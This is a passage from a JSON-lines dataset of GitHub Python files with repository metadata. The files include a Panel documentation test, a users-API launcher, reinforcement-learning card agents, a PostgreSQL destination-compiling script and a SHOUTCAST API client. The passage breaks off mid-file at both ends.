assert layouts - exceptions - docs == set()\n\n\n@ref_available\ndef test_widgets_are_in_reference_gallery():\n exceptions = {\"Ace\", \"CompositeWidget\", \"Widget\", \"ToggleGroup\", \"NumberInput\", \"Spinner\"}\n docs = {\n f.with_suffix(\"\").name\n for g in (\"indicators\", \"widgets\")\n for f in (REF_PATH / g).iterdir()\n }\n\n def is_panel_widget(attr):\n widget = getattr(pn.widgets, attr)\n return isclass(widget) and issubclass(widget, pn.widgets.Widget)\n\n widgets = set(filter(is_panel_widget, dir(pn.widgets)))\n assert widgets - exceptions - docs == set()\n\n\n@ref_available\ndef test_panes_are_in_reference_gallery():\n exceptions = {\"PaneBase\", \"YT\", \"RGGPlot\", \"Interactive\", \"ICO\", \"Image\", \"IPyLeaflet\"}\n docs = {f.with_suffix(\"\").name for f in (REF_PATH / \"panes\").iterdir()}\n\n def is_panel_pane(attr):\n pane = getattr(pn.pane, attr)\n return isclass(pane) and issubclass(pane, pn.pane.PaneBase)\n\n panes = set(filter(is_panel_pane, dir(pn.pane)))\n assert panes - exceptions - docs == set()\n\n\n@doc_available\n@pytest.mark.parametrize(\n \"file\", doc_files, ids=[str(f.relative_to(DOC_PATH)) for f in doc_files]\n)\ndef test_markdown_codeblocks(file, tmp_path):\n from markdown_it import MarkdownIt\n\n exceptions = (\"await\", \"pn.serve\", \"django\", \"raise\", \"display(\")\n\n md_ast = MarkdownIt().parse(file.read_text(encoding=\"utf-8\"))\n lines = \"\"\n for n in md_ast:\n if n.tag == \"code\" and n.info is not None:\n if \"pyodide\" in n.info.lower():\n if \">>>\" not in n.content:\n lines += n.content\n if not lines:\n return\n\n ast.parse(lines)\n\n if any(w in lines for w in exceptions):\n return\n\n mod = tmp_path / f'{file.stem}.py'\n\n with open(mod, 'w', encoding='utf-8') as f:\n f.writelines(lines)\n\n runpy.run_path(mod)\n","repo_name":"holoviz/panel","sub_path":"panel/tests/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":3266,"dataset":"github-code","pt":"3"} +{"seq_id":"47354650278","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Sarfraz Kapasi'\n__license__ = 'GPL-3'\n\n# standard\nimport os\nimport json\nimport logging\nimport argparse\n# custom\nfrom net.shksystem.common.utils import init_logger\nfrom net.shksystem.web.users.api import run_api\n\n# Globals\n# =============================================================================\n\nlogger = logging.getLogger(__name__)\n\n# Main\n# =============================================================================\n\ndef main():\n ## arguments\n parser = argparse.ArgumentParser(description='users api executable')\n\n parser.add_argument(\n '-p',\n '--port',\n help='port to listen on',\n type=int,\n default=8080\n )\n parser.add_argument(\n '-l',\n '--logfile',\n help='path to log file',\n default='users.out'\n )\n parser.add_argument(\n '-v',\n '--verbosity',\n help='DEBUG switch',\n action='store_true'\n )\n parser.add_argument(\n '-d',\n '--db-url',\n help='database url',\n default='sqlite:///users.db'\n )\n parser.add_argument(\n '-b',\n '--postgres-backend',\n help='postgresql backend to use',\n default='psycopg2'\n )\n args = parser.parse_args()\n\n\n ## logging\n if args.verbosity:\n logger = init_logger(args.logfile, logging.DEBUG)\n else:\n logger = init_logger(args.logfile, logging.ERROR)\n\n database_url = args.db_url\n if database_url.startswith('postgresql'):\n database_url = database_url.replace('postgresql',\n 'postgresql+{0}'.format(args.postgres_backend,))\n\n run_api(database_url, port=args.port, debug=args.verbosity)\n\nif __name__ == '__main__':\n main()\n\n#\n","repo_name":"sarfraz0/shk-users","sub_path":"users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28811385521","text":"'''\nCreated on 6 Oct 2016\n\n@author: fressi\n'''\n\nimport glob\nimport json\nimport logging\nimport os\n\nimport jinja2\nimport yaml\n\nimport transit_www\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass Model(object):\n \"\"\"Data model for HTML file builder.\"\"\"\n\n @classmethod\n def from_yaml(cls, yaml_name):\n \"\"\"Load configuration form YAML file.\"\"\"\n loader = jinja2.PackageLoader(\n package_name=transit_www.__name__, package_path='')\n env = jinja2.Environment(loader=loader)\n yaml_text = env.get_template(yaml_name).render()\n return cls(env=env, conf=yaml.load(yaml_text))\n\n def __init__(self, env, conf):\n \"\"\"It creates the model given jinja environment and configuration.\"\"\"\n self._env = env\n self._conf = conf\n self._text_files = {}\n\n @property\n def google_api_keys(self):\n \"\"\"It gets Google Maps API key from configuration file.\"\"\"\n\n return self._conf['google']['api-keys']\n\n def get_text_file(self, file_name, **variables):\n \"\"\"It lads a template, replace veriables and return resulting file.\"\"\"\n\n variables['transit'] = json.dumps(self._conf['transit'])\n variables['feed'] = json.dumps(self._conf['feed'])\n text_file = self._text_files.get(file_name)\n if text_file is None:\n text_file = self._env.get_template(file_name).render(**variables)\n self._text_files[file_name] = text_file\n return text_file\n\n def get_text_files(self, file_names, **variables):\n \"\"\"It lads and renders template files matching given wildcards.\"\"\"\n\n base_dir = os.path.dirname(transit_www.__file__)\n parts = tuple(file_names.split('/'))\n full_name = os.path.join(base_dir, *parts)\n for file_name in glob.glob(full_name):\n template_name = os.path.relpath(file_name, base_dir)\n yield self.get_text_file(template_name, **variables)\n\n def get_data_file(self, file_name):\n \"\"\"It lads a template, replace veriables and return resulting file.\"\"\"\n base_dir = os.path.join(os.path.dirname(transit_www.__file__), 'html')\n parts = tuple(file_name.split('/'))\n full_name = os.path.join(base_dir, *parts)\n with open(full_name, \"rb\") as stream:\n return stream.read()\n\n def iter_feeds(self):\n target_dir = self._conf['feed'][0]['dir']\n rule_dir = self._conf['feed'][0]['url']\n for direrctory, _, file_names in os.walk(target_dir):\n for name in file_names:\n _, ext = os.path.splitext(name)\n if ext == '.gz':\n feed_path = os.path.join(\n os.path.relpath(direrctory, target_dir), name)\n rule = '/'.join([\"\", rule_dir, feed_path])\n target_file = os.path.join(target_dir, feed_path)\n yield Feed(rule, target_file)\n\n\nclass Feed(object):\n\n def __init__(self, rule, target_file):\n self.rule = rule\n self.target_file = target_file\n\n @property\n def endpoint(self):\n return 'feed' + str(id(self))\n\n def view_func(self):\n with open(self.target_file, \"rb\") as stream:\n return stream.read()\n","repo_name":"pubtransit/pubtransit","sub_path":"transit_www/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"70780178321","text":"import time\nimport numpy as np\nimport pandas as pd\nimport random as rd\nimport matplotlib.pyplot as plt\nfrom enum import Enum\nfrom random import shuffle as rshuffle\nimport tensorflow.compat.v2 as tf\nfrom tensorflow import keras\nimport tensorflow as tf1\n\nimport deal_cards as dc\nimport cards_env as ce\nimport discard_q_net_keras_3 as q_net\n\n#\ndef best_6_cards(y_true, y_pred):\n oindex = tf1.argsort(y_pred, direction='DESCENDING', axis=-1)\n top_1 = tf1.math.top_k(oindex, 1)\n return top_1 #it is NOT a list. give up\n\n\nclass RandomAgent:\n def __init__(self):\n self.decide_his={}\n return\n \n def decide(self, state2):\n oindex = np.where(state2 > 0)[0]\n discard_candiates_len = len(oindex)\n\n action_index = np.random.choice(discard_candiates_len)\n action = oindex[action_index]\n \n if action not in self.decide_his.keys():\n self.decide_his[action] = 1\n else:\n self.decide_his[action] += 1\n\n behavior = 1. / discard_candiates_len # why ?? A: 概率为1/n=b(A|S). 这是异策的关键\n return action, behavior\n\n\nclass DiscardAgent_net1_PI(q_net.DiscardAgent_net6_base): #1 step\n #input = onehot*54; output=54*p()\n def __init__(self, gamma=0.0):\n self.gamma = gamma\n\n input_size=54\n hidden_layers = [[256, 0.2], [64, 0.2]]\n output_size=54\n activation=tf.nn.relu\n loss=tf.losses.categorical_crossentropy # tf.losses.mse\n output_activation=tf.nn.softmax\n learning_rate = 0.001\n self.policy_net = self.build_network(input_size, hidden_layers, output_size,\n activation, loss, output_activation, learning_rate)\n\n input_size=54\n hidden_layers = [[128, 0.2]]\n output_size=1\n activation=tf.nn.relu\n loss=tf.losses.mse\n output_activation=None\n learning_rate = 0.001\n self.v_net = self.build_network(input_size, hidden_layers, output_size,\n activation, loss, output_activation, learning_rate)\n return\n \n def decide(self, state2):\n oindex = np.where(state2 > 0)[0]\n state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n actions0 = self.policy_net.predict(state).reshape(-1) #oindex(54,), action0(1,54)->(54)\n actions1 = actions0[oindex]\n actions_index0 = np.argsort(-actions1)\n actions_index = actions_index0[:6]\n actions = oindex[actions_index]\n return actions\n\n def pre_learn(self, state2, action, reward, done, best_discards_oindex):\n #loss = mse MUST\n discard_possibility = np.zeros(54)\n\n discard_possibility[best_discards_oindex] = 1/6\n y = discard_possibility[np.newaxis]\n \n state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n self.policy_net.fit(state, y, verbose=0)\n return\n\n def learn(self, state2, action, reward, done, best_discards_oindex):\n discard_possibility = np.zeros(54)\n\n discard_possibility[best_discards_oindex] = 1/6\n G = reward # 回报\n gamma = self.gamma # 1 round\n y = gamma * G * discard_possibility\n y = y[np.newaxis]\n \n state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n self.policy_net.fit(state, y, verbose=0)\n return\n\n\nclass DiscardAgent_net6_PI(q_net.DiscardAgent_net6_base): #6 steps\n #input = onehot*54; output=54*p()\n def __init__(self, hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, reload=False, \n gamma=0.2, loss1=tf.losses.categorical_crossentropy, epsilon=0.0, flash_t=False ):\n super().__init__(learning_rate, epsilon=epsilon, gamma=gamma, flash_t=flash_t)\n \n self.filename_pi = filename_pi\n self.filename_v = filename_v\n\n if ( reload == True ):\n self.policy_net = self.load_model(filename_pi, loss1)\n self.v_net = self.load_model(filename_v)\n self.policy_net.summary()\n self.v_net.summary()\n else:\n input_size=54\n #hidden_layers = [[256, 0.2], [64, 0.2]]\n #hidden_layers = [[4096, 0.2], [512, 0.2], [128, 0.2]]\n hidden_layers = hidden_layers_pi\n output_size=54\n activation=tf.nn.relu\n loss=loss1 #tf.losses.categorical_crossentropy # tf.losses.mse\n output_activation=tf.nn.softmax\n learning_rate = learning_rate #0.00001\n self.policy_net = self.build_network(input_size, hidden_layers, output_size,\n activation, loss, output_activation, learning_rate)\n \n input_size=54\n #hidden_layers = [[1024, 0.2], [128, 0.2]]\n hidden_layers = hidden_layers_v\n output_size=1\n activation=tf.nn.relu\n loss=tf.losses.mse\n output_activation=None\n learning_rate = learning_rate #0.00001\n self.v_net = self.build_network(input_size, hidden_layers, output_size,\n activation, loss, output_activation, learning_rate)\n return\n\n def decide(self, state2, train=True):\n b = 1 #dummy for behavior\n if np.random.rand() < self.epsilon and train==True:\n #TBD: here is off-policy like. should not epsilon in in-policy alg !!\n oindex = np.where(state2 > 0)[0] # '!=' => '>' due to -1, 10, 100\n q_max_index = np.random.choice(len(oindex))\n q_max_oindex = oindex[q_max_index]\n #b = 1.0/len(oindex) #in-policy never use it (b)\n else:\n q_max_oindex, action0_index, action0 = super().decide_6(self.policy_net, state2)\n \n if True == train :\n return q_max_oindex, b\n else:\n return q_max_oindex, b, action0_index, action0\n \n\n def decide_onego(self, state2): #collect 6 cards once. state2 size MUST be 18\n q_max_oindex, action0_index, action0 = super().decide_1(self.policy_net, state2)\n return q_max_oindex, action0_index, action0\n\n def pre_learn_G(self, trajectory0): #G support batch=1 only\n #manual reward\n Gs = []\n Gs_gamma = []\n G = 0\n trajectory = np.array(trajectory0)\n state2s = trajectory[:,0].tolist()\n state2s = np.array(state2s)\n \n vs = self.v_net.predict(state2s)\n vs = vs.reshape(-1)\n T = trajectory.shape[0] #6\n \n reward = 0\n for t, step_list in enumerate(reversed(trajectory0)): #[::-1]: 0-5\n state2, action, reward0, behavior = step_list[0], step_list[1], step_list[2], step_list[5]\n\n #if t == 0: #last R=1. have to use the 1 step reward rather than 6 step reward\n # reward = reward0 #extend the last R to all 6 steps. \n reward = reward0\n cards_counter = state2.sum()\n G = reward + self.gamma * G\n G_gamma = G * self.gamma **(T-t-1)\n vs[T-t-1] = vs[T-t-1] * self.gamma **(T-t-1)\n Gs.insert(0, G)\n G_gamma -= vs[T-t-1] #baseline\n G_gamma /= behavior #cum_behavior # **t: diff to ch7.py\n Gs_gamma.insert(0, G_gamma)\n \n Gs = np.array(Gs)[:, np.newaxis]\n Gs_gamma = np.array(Gs_gamma)[:, np.newaxis]\n actions = trajectory[:,1].tolist()\n \n discard_possibility0 = np.eye(54)[actions]\n discard_possibility = discard_possibility0 * Gs_gamma\n \n #print(Gs.shape, state2s.shape, discard_possibility.shape)\n his = self.policy_net.fit(state2s, discard_possibility, verbose=0)\n self.v_net.fit(state2s, Gs, verbose=0)\n return his\n\n def save_models(self):\n super().save_model(self.policy_net, self.filename_pi)\n super().save_model(self.v_net, self.filename_v)\n\n\nclass OffPolicyDiscardAgent_net6_PI(DiscardAgent_net6_PI): #6 steps\n def __init__(self, hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, \n reload=False, gamma=0.2):\n self.agent_b = RandomAgent()\n \n def my_loss(y_true, y_pred): #YDL: 就是对loss=dot(),对theta求梯度 \n # y_true = y = (df['psi'] / df['behavior']) = (gamma^t * Gt) / b(A|S)\n # y_pred = pi(A|S,theta)\n # - y_true * y_pred 就是ch7.3的theta更新公式. 这样用tf的loss函数, miao!!!\n # loss(theta),对theta求梯度 = -(gamma^t * Gt) / b(A|S) * delta(pi(A|S,theta))\n loss_b = -tf.reduce_sum(y_true * y_pred, axis=-1)\n return loss_b\n \n super().__init__(hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, \n reload=reload, gamma=gamma, loss1=my_loss)\n \n def decide(self, state2, train=True):\n b = 1\n if True == train :\n action, b = self.agent_b.decide(state2)\n else:\n action, _, action0_index, action0 = super().decide(state2, train=False)\n\n if True == train :\n return action, b\n else:\n return action, b, action0_index, action0\n \n \n","repo_name":"qch1976/cards40","sub_path":"discard_pi_net_keras_3.py","file_name":"discard_pi_net_keras_3.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25278409554","text":"#!/usr/bin/python\n#\n# 2023 Ensomniac Ryan Martin, ryan@ensomniac.com\n# Andrew Stet, stetandrew@gmail.com\n\nimport os\nimport sys\n\nfrom Dash import LocalStorage\nfrom Dash.Properties.SharedProperty import SharedProperty\n\n\nclass Configuration:\n _dash_context: dict\n\n def __init__(self, dash_context_asset_path, config_type):\n self.asset_path = dash_context_asset_path\n self.config_type = config_type # Ex: vibe / billing_status / component\n self.shared_property_objects = []\n\n @property\n def DashContext(self):\n if not hasattr(self, \"_dash_context\"):\n from Dash import PackageContext as Context\n\n self._dash_context = Context.Get(self.asset_path)\n\n return self._dash_context\n\n @property\n def StorePath(self):\n if self.asset_path == \"authentic\":\n # TODO: Authentic will need to be updated to the new format at some point\n return f\"sb_config_{self.config_type}\"\n\n else:\n # New format\n return os.path.join(\"config_properties\", self.config_type)\n\n @property\n def SharedProperties(self):\n shared_properties = []\n\n for sp in self.shared_property_objects:\n shared_properties.append(sp.ToDict())\n\n return shared_properties\n\n def AddProperty(\n self,\n display_name,\n key,\n prop_type,\n min_value=None,\n max_value=None,\n default_value=None,\n property_set_key=None\n ):\n self.shared_property_objects.append(SharedProperty(\n display_name=display_name,\n key=key,\n prop_type=prop_type,\n min_value=min_value,\n max_value=max_value,\n default_value=default_value,\n property_set_key=property_set_key,\n ))\n\n def CreateConfig(self):\n from Dash.Properties import MergeDefaultValues\n\n additional_data = MergeDefaultValues(\n {\"config_type\": self.config_type},\n self.SharedProperties,\n self\n )\n\n created_config = LocalStorage.New(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n additional_data=additional_data\n )\n\n response = self.GetAll()\n response[\"config_type\"] = self.config_type\n response[\"new_id\"] = created_config[\"id\"]\n\n return response\n\n def GetAll(self):\n response = LocalStorage.GetAll(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n # sort_by_key=\"combo_id\"\n sort_by_key=\"display_name\"\n )\n\n response[\"shared_properties\"] = []\n\n for sp in self.shared_property_objects:\n response[\"shared_properties\"].append(sp.ToDict())\n\n return response\n\n def SetConfigProperty(self, obj_id, key, value):\n if key == \"display_name\":\n self.check_if_property_exists(key, value)\n self.set_combo_id(obj_id, value)\n\n return LocalStorage.SetProperty(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n obj_id=obj_id,\n key=key,\n value=value\n )\n\n def Delete(self, obj_id):\n delete_result = LocalStorage.Delete(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n obj_id=obj_id\n )\n\n result = self.GetAll()\n\n result[\"delete_result\"] = delete_result\n result[\"config_type\"] = self.config_type\n\n return result\n\n def check_if_property_exists(self, key, value):\n all_properties = self.GetAll()[\"data\"]\n\n for property_id in all_properties:\n property_data = all_properties[property_id]\n\n if property_data.get(key) != value:\n continue\n\n from Dash.Utils import ClientAlert\n\n raise ClientAlert(f\"'{value}' already exists, please use a different '{key}'\")\n\n def set_combo_id(self, obj_id, value):\n from Dash.Utils import GetAssetPath\n\n LocalStorage.SetProperty(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n obj_id=obj_id,\n key=\"combo_id\",\n value=GetAssetPath(value)\n )\n","repo_name":"ensomniac/dash","sub_path":"pydash/Dash/Properties/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74321124242","text":"\"\"\"\r\nCompile destinations.\r\n\r\nCollates destinations based on configuration settings from OpenStreetMap\r\ndata.\r\n\"\"\"\r\n\r\nimport time\r\n\r\nimport psycopg2\r\n\r\n# Set up project and region parameters for GHSCIC analyses\r\nfrom _project_setup import *\r\nfrom script_running_log import script_running_log\r\n\r\n\r\ndef main():\r\n # simple timer for log file\r\n start = time.time()\r\n script = os.path.basename(sys.argv[0])\r\n\r\n # OUTPUT PROCESS\r\n task = 'Compile study region destinations'\r\n print(\r\n 'Commencing task: {} at {}'.format(\r\n task, time.strftime('%Y%m%d-%H%M%S'),\r\n ),\r\n )\r\n # list destinations which have OpenStreetMap specified as their data source\r\n df_osm_dest_unique = df_osm_dest[\r\n ['dest_name', 'dest_full_name', 'domain']\r\n ].drop_duplicates(subset=['dest_name'])\r\n df_osm_dest['pre-condition'] = df_osm_dest['pre-condition'].replace(\r\n 'NULL', 'OR',\r\n )\r\n # dest_osm_list = [x.encode('utf') for x in df_osm_dest_unique['dest_name']]\r\n # Create destination type table in sql database\r\n # connect to the PostgreSQL server\r\n conn = psycopg2.connect(dbname=db, user=db_user, password=db_pwd)\r\n curs = conn.cursor()\r\n\r\n # Create empty combined destination table\r\n create_dest_type_table = \"\"\"\r\n DROP TABLE IF EXISTS dest_type;\r\n CREATE TABLE dest_type\r\n (\r\n dest_name varchar PRIMARY KEY,\r\n dest_name_full varchar,\r\n domain varchar NOT NULL,\r\n count integer\r\n );\r\n \"\"\"\r\n curs.execute(create_dest_type_table)\r\n conn.commit()\r\n\r\n create_destinations_table = \"\"\"\r\n DROP TABLE IF EXISTS destinations CASCADE;\r\n CREATE TABLE destinations\r\n (\r\n dest_oid SERIAL PRIMARY KEY,\r\n osm_id varchar,\r\n dest_name varchar NOT NULL,\r\n dest_name_full varchar NOT NULL,\r\n geom geometry(POINT)\r\n );\r\n \"\"\"\r\n curs.execute(create_destinations_table)\r\n conn.commit()\r\n\r\n print('\\nImporting destinations...')\r\n print(\r\n '\\n{dest:50} {dest_count}'.format(\r\n dest='Destination', dest_count='Import count',\r\n ),\r\n )\r\n # for dest in dest_osm_list:\r\n for row in df_osm_dest_unique.itertuples():\r\n dest = getattr(row, 'dest_name')\r\n dest_name_full = getattr(row, 'dest_full_name')\r\n domain = getattr(row, 'domain')\r\n dest_condition = []\r\n for condition in ['AND', 'OR', 'NOT']:\r\n # for condition in df_osm_dest[df_osm_dest['dest_name']==dest]['pre-condition'].unique():\r\n # print(condition)\r\n if condition == 'AND':\r\n clause = ' AND '.join(\r\n df_osm_dest[\r\n (df_osm_dest['dest_name'] == dest)\r\n & (df_osm_dest['pre-condition'] == 'AND')\r\n ]\r\n .apply(\r\n lambda x: f'{x.key} IS NOT NULL'\r\n if x.value == 'NULL'\r\n else f\"{x.key} = '{x.value}'\",\r\n axis=1,\r\n )\r\n .values.tolist(),\r\n )\r\n dest_condition.append(clause)\r\n if condition == 'OR':\r\n clause = ' OR '.join(\r\n df_osm_dest[\r\n (df_osm_dest['dest_name'] == dest)\r\n & (df_osm_dest['pre-condition'] == 'OR')\r\n ]\r\n .apply(\r\n lambda x: f'{x.key} IS NOT NULL'\r\n if x.value == 'NULL'\r\n else f\"{x.key} = '{x.value}'\",\r\n axis=1,\r\n )\r\n .values.tolist(),\r\n )\r\n dest_condition.append(clause)\r\n if condition != 'NOT':\r\n clause = ' AND '.join(\r\n df_osm_dest[\r\n (df_osm_dest['dest_name'] == dest)\r\n & (df_osm_dest['pre-condition'] == 'NOT')\r\n ]\r\n .apply(\r\n lambda x: f'{x.key} IS NOT NULL'\r\n if x.value == 'NULL'\r\n else f\"{x.key} != '{x.value}' OR access IS NULL\",\r\n axis=1,\r\n )\r\n .values.tolist(),\r\n )\r\n dest_condition.append(clause)\r\n dest_condition = [x for x in dest_condition if x != '']\r\n # print(len(dest_condition))\r\n if len(dest_condition) == 1:\r\n dest_condition = dest_condition[0]\r\n else:\r\n dest_condition = '({})'.format(') AND ('.join(dest_condition))\r\n print(dest_condition)\r\n combine__point_destinations = f\"\"\"\r\n INSERT INTO destinations (osm_id, dest_name,dest_name_full,geom)\r\n SELECT osm_id, '{dest}','{dest_name_full}', d.geom\r\n FROM {osm_prefix}_point d\r\n WHERE {dest_condition};\r\n \"\"\"\r\n curs.execute(combine__point_destinations)\r\n conn.commit()\r\n\r\n # get point dest count in order to set correct auto-increment start value for polygon dest OIDs\r\n curs.execute(\r\n f\"\"\"SELECT count(*) FROM destinations WHERE dest_name = '{dest}';\"\"\",\r\n )\r\n dest_count = int(list(curs)[0][0])\r\n\r\n combine_poly_destinations = f\"\"\"\r\n INSERT INTO destinations (osm_id, dest_name,dest_name_full,geom)\r\n SELECT osm_id, '{dest}','{dest_name_full}', ST_Centroid(d.geom)\r\n FROM {osm_prefix}_polygon d\r\n WHERE {dest_condition};\r\n \"\"\"\r\n curs.execute(combine_poly_destinations)\r\n conn.commit()\r\n\r\n curs.execute(\r\n f\"\"\"SELECT count(*) FROM destinations WHERE dest_name = '{dest}';\"\"\",\r\n )\r\n dest_count = int(list(curs)[0][0])\r\n\r\n if dest_count > 0:\r\n summarise_dest_type = f\"\"\"\r\n INSERT INTO dest_type (dest_name,dest_name_full,domain,count)\r\n SELECT '{dest}',\r\n '{dest_name_full}',\r\n '{domain}',\r\n {dest_count}\r\n \"\"\"\r\n curs.execute(summarise_dest_type)\r\n conn.commit()\r\n # print destination name and tally which have been imported\r\n print(f'\\n{dest:50} {dest_count:=10d}')\r\n print(f'({dest_condition})')\r\n\r\n if custom_destinations['file'] is not None:\r\n import pandas as pd\r\n from sqlalchemy import create_engine, inspect\r\n\r\n engine = create_engine(\r\n f'postgresql://{db_user}:{db_pwd}@{db_host}/{db}',\r\n )\r\n db_contents = inspect(engine)\r\n df = pd.read_csv(f'{region_dir}/{custom_destinations[\"file\"]}')\r\n df.to_sql('custom_destinations', engine, if_exists='replace')\r\n sql = f\"\"\"\r\n INSERT INTO destinations (dest_name,dest_name_full,geom)\r\n SELECT {custom_destinations[\"dest_name\"]}::text dest_name,\r\n {custom_destinations[\"dest_name_full\"]}::text dest_name_full,\r\n ST_Transform(ST_SetSRID(ST_Point(\r\n \"{custom_destinations[\"lon\"]}\"::float,\r\n \"{custom_destinations[\"lat\"]}\"::float),\r\n {custom_destinations[\"epsg\"]}),\r\n {crs['srid']}\r\n ) geom\r\n FROM custom_destinations;\r\n \"\"\"\r\n curs.execute(sql)\r\n conn.commit()\r\n\r\n create_destinations_indices = \"\"\"\r\n CREATE INDEX destinations_dest_name_idx ON destinations (dest_name);\r\n CREATE INDEX destinations_geom_geom_idx ON destinations USING GIST (geom);\r\n \"\"\"\r\n curs.execute(create_destinations_indices)\r\n conn.commit()\r\n curs.execute(grant_query)\r\n\r\n # output to completion log\r\n script_running_log(script, task, start, codename)\r\n conn.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Aniketkn/ineuron.ai","sub_path":"process/subprocesses/_05_compile_destinations.py","file_name":"_05_compile_destinations.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70438954962","text":"# 14888\n\n# +, -, *, //\nfrom itertools import permutations\nimport copy\nimport sys\ninput()\nminVal = 1000000000\nmaxVal = -1000000000\ndataList = list(map(int, sys.stdin.readline().split()))\nmethodList = list(map(int, sys.stdin.readline().split()))\nmethodStr = \"\"\nmethodStr += \"+\" * methodList[0]\nmethodStr += \"-\" * methodList[1]\nmethodStr += \"*\" * methodList[2]\nmethodStr += \"/\" * methodList[3]\n\nfor operation in set(permutations(methodStr, len(methodStr))):\n # 계산 로직\n tempList = copy.deepcopy(dataList)\n calVal = tempList.pop(0)\n for idx, op in enumerate(operation):\n if op == \"+\":\n calVal += tempList[idx]\n elif op == \"-\":\n calVal -= tempList[idx]\n elif op == \"*\":\n calVal *= tempList[idx]\n else:\n if calVal < 0:\n calVal = -(calVal)\n calVal //= tempList[idx]\n calVal = -(calVal)\n else:\n calVal //= tempList[idx]\n maxVal = max(maxVal, calVal)\n minVal = min(minVal, calVal)\n\nprint(maxVal)\nprint(minVal)\n","repo_name":"tomxoghks789/pyAlgo","sub_path":"Brute force/연산자 끼워넣기.py","file_name":"연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22764066391","text":"import xmltodict\nimport json\nfrom .models import Tunein\nfrom .utils import _init_session\nfrom .Exceptions import APIException\n\nbase_url = 'http://api.shoutcast.com'\ntunein_url = 'http://yp.shoutcast.com/{base}?id={id}'\n\ntuneins = [Tunein('/sbin/tunein-station.pls'), Tunein('/sbin/tunein-station.m3u'), Tunein('/sbin/tunein-station.xspf')]\n\n\ndef call_api_xml(endpoint, params=None, session=None):\n session = _init_session(session)\n request_url = \"{}{}\".format(base_url, endpoint)\n response = session.get(request_url, params=params)\n if response.status_code == 200:\n response_as_dict = xmltodict.parse(response.content)\n api_response = response_as_dict.get('response')\n\n if api_response:\n api_status_code = int(api_response.get('statusCode'))\n message = \"statusText:{}, statusDetailText:{}\".format(\n api_response.get('statusText'), api_response.get('statusDetailText')\n )\n raise APIException(message, code=api_status_code)\n\n return response_as_dict\n raise APIException(response.content, code=response.status_code)\n\n\ndef call_api_json(endpoint, params=None, session=None):\n session = _init_session(session)\n request_url = \"{}{}\".format(base_url, endpoint)\n response = session.get(request_url, params=params)\n if response.status_code == 200:\n json_response = json.loads(response.content.decode('utf-8'))\n\n api_response = json_response.get('response')\n api_status_code = int(api_response.get('statusCode'))\n\n if api_status_code != 200:\n message = \"statusText:{}, statusDetailText:{}\".format(\n api_response.get('statusText'), api_response.get('statusDetailText', '')\n )\n raise APIException(message, code=api_status_code)\n\n return json_response.get('response')['data']\n raise APIException(response.reason, code=response.status_code)\n\n\ndef call_api_tunein(station_id: int, session=None):\n session = _init_session(session)\n url = tunein_url.format(base=tuneins[2], id=station_id)\n response = session.get(url)\n if response.status_code == 200:\n api_response = xmltodict.parse(response.content.decode('utf-8'))\n return api_response\n raise APIException(response.reason, code=response.status_code)\n\n\ndef call_api_tunein_any(base: Tunein, station_id: int, session=None):\n session = _init_session(session)\n url = tunein_url.format(base=base, id=station_id)\n response = session.get(url)\n if response.status_code == 200:\n return response.content.decode('utf-8')\n raise APIException(response.reason, code=response.status_code)\n","repo_name":"eadwinCode/shoutcast_api","sub_path":"shoutcast_api/shoutcast_request.py","file_name":"shoutcast_request.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"25643657592","text":"import os\nimport time\nimport datetime\n\nMovie_fact_path = \"../DataToUse/movie/factDB_movie\"\nMovie_claim_path = \"../DataToUse/movie/claimDB_movie\"\n\nBook_fact_path = \"../DataToUse/book/factDB_book\"\nBook_claim_path = \"../DataToUse/book/claimDB_book\"\n\ntest_fact_path = \"../DataToUse/test/testDB_fact_movie\"\ntest_claim_path = \"../DataToUse/test/testDB_claim_movie\"\n\ndef MV(dataset, datasetPath, outputWritePath):\n def generate_fact_dict(factdict, dataWriteLine):\n dataSplit = dataWriteLine.split(\"\\t\")\n factdict[dataSplit[0]] = dict()\n factdict[dataSplit[0]][dataSplit[1]] = dataSplit[2] # BID, MID: Aurthor, Director\n\n def generate_claim_dict(claimdict, dataWriteLine):\n dataSplit = dataWriteLine.split(\"\\t\")\n if dataSplit[0] not in claimdict.keys():\n claimdict[dataSplit[0]] = dict()\n claimdict[dataSplit[0]][dataSplit[1]] = dataSplit[2]\n\n def generate_object_claim_dict(factDict, claimDict):\n object_claim_count_dict = dict()\n for key1 in claimDict.keys():\n for key2 in factDict[key1].keys():\n if key2 not in object_claim_count_dict.keys():\n object_claim_count_dict[key2] = dict()\n if key1 not in object_claim_count_dict[key2].keys():\n object_claim_count_dict[key2][key1] = 0\n for key3 in claimDict[key1].keys():\n if claimDict[key1][key3] == \"1\":\n 